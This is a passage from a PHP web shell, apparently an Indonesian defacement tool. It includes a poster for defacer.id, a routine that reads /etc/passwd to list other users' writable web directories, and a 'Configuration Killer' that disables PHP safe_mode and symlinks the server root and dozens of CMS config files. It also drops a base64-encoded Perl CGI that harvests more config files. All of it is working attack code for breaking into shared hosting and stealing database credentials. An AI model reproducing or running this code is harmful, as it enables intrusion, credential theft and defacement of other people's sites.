2672. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
2673. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
2674. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
2675. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2676. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
2677. $result = curl_exec($curl);
2678. echo $result;
2679. curl_close($curl);
2680.  
2681. }
2682. }
2683. }
2684. else {
2685. echo"<center>
2686. <font style='text-decoration: underline;'>Defacer-ID Poster :</font><br>
2687. <form method='post' action='' >
2688. <br><input type='text' name='cawet' value='Jingklong'>
2689. <br><input type='text' name='sempak' value='BAHARI TROUBLE MAKER'>
2690. <br>
2691. <textarea style='width: 450px; height: 150px;' name='sites'></textarea>
2692. <br>
2693. <br>
2694. <input type='submit' name='kutang' value='POST!'>
2695. </form>
2696. </center>";
2697. }
2698. }
2699. elseif($_GET['do'] == 'jumping') {
2700. $i = 0;
2701. echo "<div class='margin: 5px auto;'>";
2702. if(preg_match("/hsphere/", $dir)) {
2703. $urls = explode("\r\n", $_POST['url']);
2704. if(isset($_POST['jump'])) {
2705. echo "<pre>";
2706. foreach($urls as $url) {
2707. $url = str_replace(array("http://","www."), "", strtolower($url));
2708. $etc = "/etc/passwd";
2709. $f = fopen($etc,"r");
2710. while($gets = fgets($f)) {
2711. $pecah = explode(":", $gets);
2712. $user = $pecah[0];
2713. $dir_user = "/hsphere/local/home/$user";
2714. if(is_dir($dir_user) === true) {
2715. $url_user = $dir_user."/".$url;
2716. if(is_readable($url_user)) {
2717. $i++;
2718. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
2719. if(is_writable($url_user)) {
2720. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
2721. }
2722. echo $jrw."<br>";
2723. }
2724. }
2725. }
2726. }
2727. if($i == 0) {
2728. } else {
2729. echo "<br>Total ada ".$i." Kamar di ".$ip;
2730. }
2731. echo "</pre>";
2732. } else {
2733. echo '<center>
2734. <form method="post">
2735. List Domains: <br>
2736. <textarea name="url" style="width: 500px; height: 250px;">';
2737. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
2738. while($getss = fgets($fp)) {
2739. echo $getss;
2740. }
2741. echo '</textarea><br>
2742. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
2743. </form></center>';
2744. }
2745. } elseif(preg_match("/vhosts|vhost/", $dir)) {
2746. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
2747. $urls = explode("\r\n", $_POST['url']);
2748. if(isset($_POST['jump'])) {
2749. echo "<pre>";
2750. foreach($urls as $url) {
2751. $url = str_replace("www.", "", $url);
2752. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
2753. if(is_dir($web_vh) === true) {
2754. if(is_readable($web_vh)) {
2755. $i++;
2756. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
2757. if(is_writable($web_vh)) {
2758. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
2759. }
2760. echo $jrw."<br>";
2761. }
2762. }
2763. }
2764. if($i == 0) {
2765. } else {
2766. echo "<br>Total ada ".$i." Kamar di ".$ip;
2767. }
2768. echo "</pre>";
2769. } else {
2770. echo '<center>
2771. <form method="post">
2772. List Domains: <br>
2773. <textarea name="url" style="width: 500px; height: 250px;">';
2774. bing("ip:$ip");
2775. echo '</textarea><br>
2776. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
2777. </form></center>';
2778. }
2779. } else {
2780. echo "<pre>";
2781. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
2782. while($passwd = fgets($etc)) {
2783. if($passwd == '' || !$etc) {
2784. echo "<font color=red>Can't read /etc/passwd</font>";
2785. } else {
2786. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
2787. foreach($user_jumping[1] as $user_idx_jump) {
2788. $user_jumping_dir = "/home/$user_idx_jump/public_html";
2789. if(is_readable($user_jumping_dir)) {
2790. $i++;
2791. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
2792. if(is_writable($user_jumping_dir)) {
2793. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
2794. }
2795. echo $jrw;
2796. if(function_exists('posix_getpwuid')) {
2797. $domain_jump = file_get_contents("/etc/named.conf");
2798. if($domain_jump == '') {
2799. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
2800. } else {
2801. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
2802. foreach($domains_jump[1] as $dj) {
2803. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
2804. $user_jumping_url = $user_jumping_url['name'];
2805. if($user_jumping_url == $user_idx_jump) {
2806. echo " => ( <u>$dj</u> )<br>";
2807. break;
2808. }
2809. }
2810. }
2811. } else {
2812. echo "<br>";
2813. }
2814. }
2815. }
2816. }
2817. }
2818. if($i == 0) {
2819. } else {
2820. echo "<br>Total ada ".$i." Kamar di ".$ip;
2821. }
2822. echo "</pre>";
2823. }
2824. echo "</div>";
2825. }
2826. elseif($_GET['do'] == 'indi') {
2827. echo "<center>";
2828. echo "<ul>";
2829. echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
2830. echo "<li> <a href='?dir=$dir&do=config2'>2nd Config</a> </li>";
2831. echo "<li> <a href='?dir=$dir&do=indi'>INDISHELL</a> </li>";
2832. echo "<li> <a href='?dir=$dir&do=vgrab'>VHosts Grabber</a> </li>";
2833. echo "</ul>";
2834. echo "</center>";
2835. $byphp = "safe_mode = Off
2836. disable_functions = None
2837. ";
2838. file_put_contents("php.ini",$byphp);
2839.  
2840. echo '<CENTER><b>Configuration Killer By Team INDISHELL</b><br><br>';
2841. ?>
2842.  
2843. <bR><form method=post>
2844. <textarea style='width: 543px; height: 420px;' name=user><?php $users=file("/etc/passwd");
2845. foreach($users as $user)
2846. {
2847. $str=explode(":",$user);
2848. echo $str[0]."\n";
2849. }
2850.  
2851. ?></textarea><br>
2852. <input type=submit name=su value="Lets Start" /></form></CENTER>
2853. <center>
2854. <?php
2855. error_reporting(0);
2856. echo "<font color=#ff00 size=2 face=\"comic sans ms\">";
2857. if(isset($_POST['su']))
2858. {
2859. mkdir('lol',0777);
2860. $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2861. $g = fopen('lol/.htaccess','w');
2862. fwrite($g,$rr);
2863. $indishell = symlink("/","lol/root");
2864. $rt="<a href=lol/root target='_blank'><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";
2865. echo "Please check link given below for / folder symlink <br><u>$rt</u>";
2866.  
2867. $dir=mkdir('BTM',0777);
2868. $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2869. $f = fopen('INJECTION/.htaccess','w');
2870.  
2871. fwrite($f,$r);
2872. $consym="<a href=BTM/ target='_blank'><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
2873. echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=white size=2 face=\"comic sans ms\">$consym<br><br></font></u>";
2874.  
2875. $usr=explode("\n",$_POST['user']);
2876. $configuration=array("wp-config.php",
2877. "wordpress/wp-config.php",
2878. "web/wp-config.php",
2879. "wp/wp-config.php",
2880. "press/wp-config.php",
2881. "wordpress/beta/wp-config.php",
2882. "news/wp-config.php",
2883. "new/wp-config.php",
2884. "blogs/wp-config.php",
2885. "home/wp-config.php",
2886. "blog/wp-config.php",
2887. "protal/wp-config.php",
2888. "site/wp-config.php",
2889. "main/wp-config.php",
2890. "test/wp-config.php",
2891. "wp/beta/wp-config.php",
2892. "beta/wp-config.php",
2893. "joomla/configuration.php",
2894. "protal/configuration.php",
2895. "joo/configuration.php",
2896. "cms/configuration.php",
2897. "site/configuration.php",
2898. "main/configuration.php",
2899. "news/configuration.php",
2900. "new/configuration.php",
2901. "home/configuration.php",
2902. "configuration.php",
2903. "SSI.php",
2904. "forum/SSI.php",
2905. "forum/inc/config.php",
2906. "forum/includes/config.php",
2907. "upload/includes/config.php",
2908. "cc/includes/config.php",
2909. "vb/includes/config.php",
2910. "vb3/includes/config.php",
2911. "cpanel/configuration.php",
2912. "panel/configuration.php",
2913. "ubmitticket.php",
2914. "manage/configuration.php",
2915. "myshop/configuration.php",
2916. "beta/configuration.php",
2917. "includes/config.php",
2918. "lib/config.php",
2919. "conf_global.php",
2920. "inc/config.php",
2921. "incl/config.php",
2922. "include/db.php",
2923. "include/config.php",
2924. "includes/functions.php",
2925. "includes/dist-configure.php",
2926. "connect.php",
2927. "mk_conf.php",
2928. "config/koneksi.php",
2929. "system/sistem.php",
2930. "config.php",
2931. "Settings.php",
2932. "settings.php",
2933. "sites/default/settings.php",
2934. "smf/Settings.php",
2935. "forum/Settings.php",
2936. "forums/Settings.php",
2937. "host/configuration.php",
2938. "hosting/configuration.php",
2939. "hosts/configuration.php",
2940. "zencart/includes/dist-configure.php",
2941. "shop/includes/dist-configure.php",
2942. "whm/configuration.php",
2943. "whmc/configuration.php",
2944. "whmcs/configuration.php",
2945. "whmc/WHM/configuration.php",
2946. "whm/WHMCS/configuration.php",
2947. "whm/whmcs/configuration.php",
2948. "order/configuration.php",
2949. "support/configuration.php",
2950. "supports/configuration.php",
2951. "oscommerce/includes/configure.php",
2952. "oscommerces/includes/configure.php",
2953. "shopping/includes/configure.php",
2954. "sale/includes/configure.php",
2955. "config.inc.php",
2956. "amember/config.inc.php",
2957. "clients/configuration.php",
2958. "client/configuration.php",
2959. "clientes/configuration.php",
2960. "cliente/configuration.php",
2961. "clientsupport/configuration.php",
2962. "billing/configuration.php",
2963. "billings/configuration.php",
2964. "admin/conf.php",
2965. "admin/config.php");
2966. foreach($usr as $uss )
2967. {
2968. $us=trim($uss);
2969.  
2970. foreach($configuration as $c)
2971. {
2972. $rs="/home/".$us."/public_html/".$c;
2973. $r="BTM/".$us." .. ".$c;
2974. symlink($rs,$r);
2975.  
2976. }
2977.  
2978. }
2979.  
2980.  
2981. }
2982.  
2983. }
2984. elseif($_GET['do'] == 'tconf') {
2985. echo "<center>";
2986. echo "<ul>";
2987. echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
2988. echo "<li> <a href='?dir=$dir&do=config2'>2nd Config</a> </li>";
2989. echo "<li> <a href='?dir=$dir&do=indi'>INDISHELL</a> </li>";
2990. echo "<li> <a href='?dir=$dir&do=vgrab'>VHosts Grabber</a> </li>";
2991. echo "</ul>";
2992. echo "</center>";
2993. }
2994. elseif($_GET['do'] == 'vgrab') {
2995. echo "<center>";
2996. echo "<ul>";
2997. echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
2998. echo "<li> <a href='?dir=$dir&do=config2'>2nd Config</a> </li>";
2999. echo "<li> <a href='?dir=$dir&do=indi'>INDISHELL</a> </li>";
3000. echo "<li> <a href='?dir=$dir&do=vgrab'>VHosts Grabber</a> </li>";
3001. echo "</ul>";
3002. echo "</center>";
3003.  
3004. echo"<br><center><form method='post'>
3005. <input type='submit' name='elgass' value='Click Here'>
3006. </form></center>";
3007.  
3008. if (isset($_POST['elgass']))
3009. {
3010. @mkdir('btbt', 0755);
3011. @chdir('btbt');
3012. $elesem = ".htaccess";
3013. $elakab = "$elesem";
3014. $filhat = fopen ($elakab , 'w') or die ("Can't Write htaccess !");
3015. $htcont = "Options FollowSymLinks MultiViews Indexes ExecCGI
3016.  
3017. AddType application/x-httpd-cgi .cin
3018.  
3019. AddHandler cgi-script .cin
3020. AddHandler cgi-script .cin";
3021. fwrite ( $filhat , $htcont ) ;
3022. fclose ($filhat);
3023. $btm = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxubiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjwvaGVhZD4NCic7DQoNCg0KcHJpbnQgJw0KPGJvZHk+DQo8cD4uOiBDb2RlZCBieSBGYWxsYWcgR2Fzc3Jpbmk8L3A+DQonOw0Kb3BlbmRpcihteSAkZGlyICwgIi92YXIvd3d3L3Zob3N0cy8iKTsNCmZvcmVhY2goc29ydCByZWFkZGlyICRkaXIpIHsNCiAgICBteSAkaXNEaXIgPSAwOw0KICAgICRpc0RpciA9IDEgaWYgLWQgJF87DQokc2l0ZXNzID0gJF87DQoNCg0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLW9zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1vc2NvbS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1vc2NvbW1lcmNlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1vc2NvbW1lcmNlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaG9wL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaG9wcGluZy9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1zaG9wcGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zYWxlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FtZW1iZXIvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy5pbmMucGhwJywkc2l0ZXNzLictYW1lbWJlcjIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLW1lbWJlcnMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLnBocCcsJHNpdGVzcy4nLTRpbWFnZXMxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1mb3J1bS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bXMvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25mLnBocCcsJHNpdGVzcy4nLTUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYWRtaW4vY29uZmlnLnBocCcsJHNpdGVzcy4nLTQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dQL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy1wcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9Xb3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmxvZy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2cudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJldGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmxvZ3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ibG9ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob21lL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wcm90YWwvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1wcm90YWwudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2l0ZS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW1haW4udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvdGVzdC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXRlc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FyY2FkZS9mdW5jdGlvbnMvZGJjbGFzcy5waHAnLCRzaXRlc3MuJy1pYnByb2FyY2FkZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1wcm90YWwudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvam9vL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Ntcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1jbXMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1zaXRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21haW4vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW5ld3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWhvbWUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXZifmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXZiM35jb25maWcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXZiMX5jb25maWcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY2xhc3NfY29yZS5waHAnLCRzaXRlc3MuJy12Ymx1dHRpbn5jbGFzc19jb3JlLnBocC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwMS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0xNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jZW50cmFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLWNlbnRyYWwudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1XSE1DUy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG1jL1dITS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobWMtV0hNLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUtd2htLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS93aG1jcy9jb25maWd1cmF0aW9uLnBo